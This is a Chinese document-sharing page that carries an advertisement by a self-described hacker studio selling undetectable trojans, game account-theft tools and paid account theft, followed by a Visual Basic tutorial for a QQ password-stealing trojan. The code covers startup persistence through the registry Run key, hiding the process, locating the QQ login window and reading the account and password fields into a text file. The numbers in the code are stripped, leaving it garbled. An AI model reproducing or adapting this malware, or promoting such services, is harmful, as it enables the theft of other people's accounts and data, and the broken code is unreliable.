下载

5下载券

加入VIP
  • 专属下载特权
  • 现金文档折扣购买
  • VIP免费专区
  • 千万文档免费下载

上传资料

关闭

关闭

关闭

封号提示

内容

首页 QQ盗号木马

QQ盗号木马

QQ盗号木马

anyejushen
2012-07-25 0人阅读 举报 0 0 0 暂无简介

简介:本文档为《QQ盗号木马doc》,可适用于IT/计算机领域

天马工作室简介天马工作室成立于年月日现成员数已达人各部门分工明确集破坏和建设于一体天马工作室对外业务部对外主营业务出售各类免杀木马盗号程序游戏盗号箱子教授黑客技术破解技术外挂编辑技术。年钻等承接指定盗号等QQ盗号程序A版截取QQ账号密码B版截取QQ账号密码及聊天记录C版截取账号密码加密保。A版¥B版¥C版¥外售QQ信封¥问道盗号程序完整版问道盗号程序破解登陆服务器登陆账号登陆密码乾坤锁仓库锁装备锁等完整版¥外出盗号信封¥¥QQ三国盗号程序完整版QQ三国盗号程序可有效截取登陆服务器登陆账号密码人物锁仓库锁。完整版¥外出盗号信封¥¥天龙八部盗号程序完整版可有效截取服务器登陆账号登陆密码二级密保密保卡完整版¥外出盗号信封¥¥以此类推国类主流网游盗号箱子一应俱全指定盗Q破保收费标准¥黑客技术盗号技术破解技术外挂编辑技术标准收费¥年钻¥稳定不掉诚信交易非城勿扰支持财务通支付宝网银手机充值卡联系方式幻季天马QQ程序编制()首先为了避免程序被多次装载造成系统资源的浪费、及不必要的错误。声明变量、过程及API函数,写在Modulebas文件中DeclareFunctionCreateFileMappingLib"kernel"Alias"CreateFileMappingA"(ByValhFileAsLong,lpFileMappigAttributesAsSECURITYATTRIBUTES,ByValflProtectAsLong,ByValdwMaximumSizeHighAsLong,ByValdwMaximumSizeLowAsLong,ByVallpNameAsString)AsLong'创建一个新的文件映射对象PrivateDeclareFunctionCloseHandleLib"kernel"(ByValhObjectAsLong)AsLong'关闭一个内核对象TypeSECURITYATTRIBUTESnLengthAsLonglpSecurityDescriptorAsLongbInheritHandleAsLongEndTypeConstPAGEREADWRITE=ConstERRORALREADYEXISTS=建立判断程序是否多启动的过程SubMain()DimynRunAsLongDimsaAsSECURITYATTRIBUTESsabInheritHandle=salpSecurityDescriptor=sanLength=Len(sa)ynRun=CreateFileMapping(HFFFFFFFF,sa,PAGEREADWRITE,,,Apptitle)'创建内存映射文件If(ErrLastDllError=ERRORALREADYEXISTS)Then'如果指定内存文件已存在则退出CloseHandleynRun'退出程序前关闭内存映射文件EndEndIfEndSub()即时监视就需要在系统启动时程序自启动这里使用修改注册表的方法声明变量、过程及API函数,写在Modulebas文件中DeclareFunctionRegCreateKeyLib"advapidll"Alias"RegCreateKeyA"(ByValhKey,ByVallpszSubKey$,lphKey)'在指定的项下创建一个新项。如指定的项已经存在那么函数会打开现有的项DeclareFunctionRegSetValueLib"advapidll"Alias"RegSetValueA"(ByValhKeyAsLong,ByVallpSubKeyAsString,ByValdwTypeAsLong,ByVallpDataAsString,ByValcbDataAsLong)AsLong'设置指定项或子项的默认值ConstHKEYLOCALMACHINE=HConstREGSZ=建立使程序自启动的过程SubAutoRun()DimsKeyNameAsString,sKeyValueAsString,sKeyValueIconAsStringDimRetAsInteger,lphKeyAsLongsKeyName="SoftwareMicrosoftWindowsCurrentVersionRun"'是启动项在注册表中位置大家可能通过regeditexe来查看sKeyValue=AppPathIIf(Len(AppPath)>,"""KillOicqexe","KillOicqexe")'monitorexe为这个程序Ret=RegCreateKey(HKEYLOCALMACHINE,sKeyName,lphKey)'创建新的启动项Ret=RegSetValue(lphKey,"",REGSZ,sKeyValue,)'设置键值EndSub()实现程序自身的隐藏(MeHide)、在关闭程序对话框中隐藏。声明变量、过程及API函数,写在Modulebas文件中DeclareFunctionRegisterServiceProcessLib"kernel"(ByValdwProcessIDAsLong,ByValdwTypeAsLong)AsLongConstRSPSIMPLESERVICE='隐藏建立实现程序自身在关闭程序对话框中的隐藏的过程SubHideMyWin()RegisterServiceProcesslngProcessID,RSPSIMPLESERVICEEndSub()即时监视是否运行了OICQ加载个Timer控件其Interval的值为(你也可以自己设置尽量少点)这个程序就是通过Timer来实现监视的。PrivateSubTimerTimer()EnumWindowsAddressOfEnumProc,'枚举窗口列表中的所有父窗口(顶级和被所有窗口)开始监视程序EndSub声明变量、过程、函数及API函数,写在Modulebas文件中OptionExplicitDeclareFunctionEnumWindowsLib"user"(ByVallpEnumFuncAsAny,ByVallParamAsLong)AsLong'遍查窗口DeclareFunctionGetWindowTextLib"user"Alias"GetWindowTextA"(ByValhwndAsLong,ByVallpStringAsString,ByValcchAsLong)AsLong'取得窗口标题DeclareFunctionGetClassNameLib"user"Alias"GetClassNameA"(ByValhwndAsLong,ByVallpClassNameAsString,ByValnMaxCountAsLong)AsLong'为指定的窗口取得类名DeclareFunctionGetWindowLib"user"(ByValhwndAsLong,ByValwCmdAsLong)AsLong'获得一个窗口的句柄ConstGWCHILD='寻找源窗口的第一个子窗口ConstGWHWNDNEXT='为源窗口寻找下一个兄弟窗口DeclareFunctionSendMessageLib"user"Alias"SendMessageA"(ByValhwndAsLong,ByValwMsgAsLong,ByValwParamAsLong,lParamAsAny)AsLong'发送消息ConstWMGETTEXT=HDConstWMGETTEXTLENGTH=HEDimbufAsStringDimnameall,name,passwordall,passwordAsStringDimiAsIntegerDimtitle,titleall,filepathAsStringPublicFunctionEnumProc(ByValapphwndAsLong,ByVallParamAsLong)AsBoolean'遍查主窗口DimbufAsString*DimlengthAsLongfilepath=AppPath"txt"'txt为保存帐号、密码的文件IfDir(filepath)=""Thentitle=""titleall=""EndIflength=GetWindowText(apphwnd,buf,Len(buf))title=Left$(buf,length)'取得窗口的标题IfInStr(title,"OICQ用户登录")Then'判断是否为QQ窗口CallGetZiWin(apphwnd)'调用()取得OICQ窗口中的帐号、密码框的类名EndIfIftitle<>""ThenIfInStr(titleall,title)ThenEnumProc=Elsetitleall=titlealltitle'title是指取得的窗口标题Ifname<>""Then'取得的帐号IfInStr(title,name)ThenSaveFile'保存帐号密码(如果取得的标题等于取得的帐号则表示用户名、密码已顺利取出了)就调用()EndIfEndIfEndIfEnumProc=EndFunction()取得OICQ窗口中的用户名、密码框的类名自定义取得子窗口类名的函数写在Modulebas文件中我们知道OICQ主窗口的用户名的类名是ComboBox密码框的类名是Edit这里可以通过取得类名的办法取得它们的句柄从而取得它们的值。PublicFunctionGetZiWin(windowhwndAsLong)AsStringDimbuflenAsLongDimchildhwndAsLongDimchildren()AsLongDimnumchildrenAsIntegerDimiAsInteger'取得类名buflen=buf=Space$(buflen)buflen=GetClassName(windowhwnd,buf,buflen)buf=Left$(buf,buflen)IfRight(buf,)="ComboBox"OrRight(buf,)="Edit"Then'进行判断GetZiWin=GetWinText(windowhwnd)'调用()取得它们的值ExitFunctionEndIfnumchildren=childhwnd=GetWindow(windowhwnd,GWCHILD)'取得第个子窗口的句柄DoWhilechildhwnd<>'如果有子窗口numchildren=numchildrenReDimPreservechildren(Tonumchildren)children(numchildren)=childhwndchildhwnd=GetWindow(childhwnd,GWHWNDNEXT)'取得下一个兄弟窗口的句柄LoopFori=TonumchildrenCallGetZiWin(children(i))NextiEndFunction()通过()已得到了用户名、密码框的类名也就取得了句柄这一步进行取值自定义取得子窗口的值的函数写在Modulebas文件中PublicFunctionGetWinText(windowhwndAsLong)AsString'取得子窗口的值DimtxtlenAsLongDimtxtAsString'通过SendMessage发送WMGETTEXT取得地址栏的值GetWinText=""Ifwindowhwnd=ThenExitFunctiontxtlen=SendMessage(windowhwnd,WMGETTEXTLENGTH,,)Iftxtlen=ThenExitFunctiontxtlen=txtlentxt=Space$(txtlen)txtlen=SendMessage(windowhwnd,WMGETTEXT,txtlen,ByValtxt)GetWinText=Left$(txt,txtlen)Ifbuf="ComboBox"Thenname=GetWinTextIfInStr(nameall,name)Theni=Elsenameall=nameallnamei=iEndIfElsepassword=GetWinTextIfInStr(passwordall,password)Theni=Elsepasswordall=passwordallpasswordi=iEndIfEndIfEndFunction()到现在程序已进行收尾阶段如果在()中判断用户名、密码顺得取出则保存相关信息。自定义保存信息的过程写在Modulebas文件中SubSaveFile()DimfilenumAsIntegerDimallstrAsStringallstr=nameSpace()passwordSpace()Now'保存帐号、密码、启动的时间filenum=FreeFileIfDir(filepath)=""ThenOpenfilepathForOutputAs#filenumElseOpenfilepathForAppendAs#filenumEndIfPrint#filenum,allstrClose#filenumEndSub

用户评价(0)

关闭

新课改视野下建构高中语文教学实验成果报告(32KB)

抱歉,积分不足下载失败,请稍后再试!

提示

试读已结束,如需要继续阅读或者下载,敬请购买!

评分:

/8

VIP

在线
客服

免费
邮箱

爱问共享资料服务号

扫描关注领取更多福利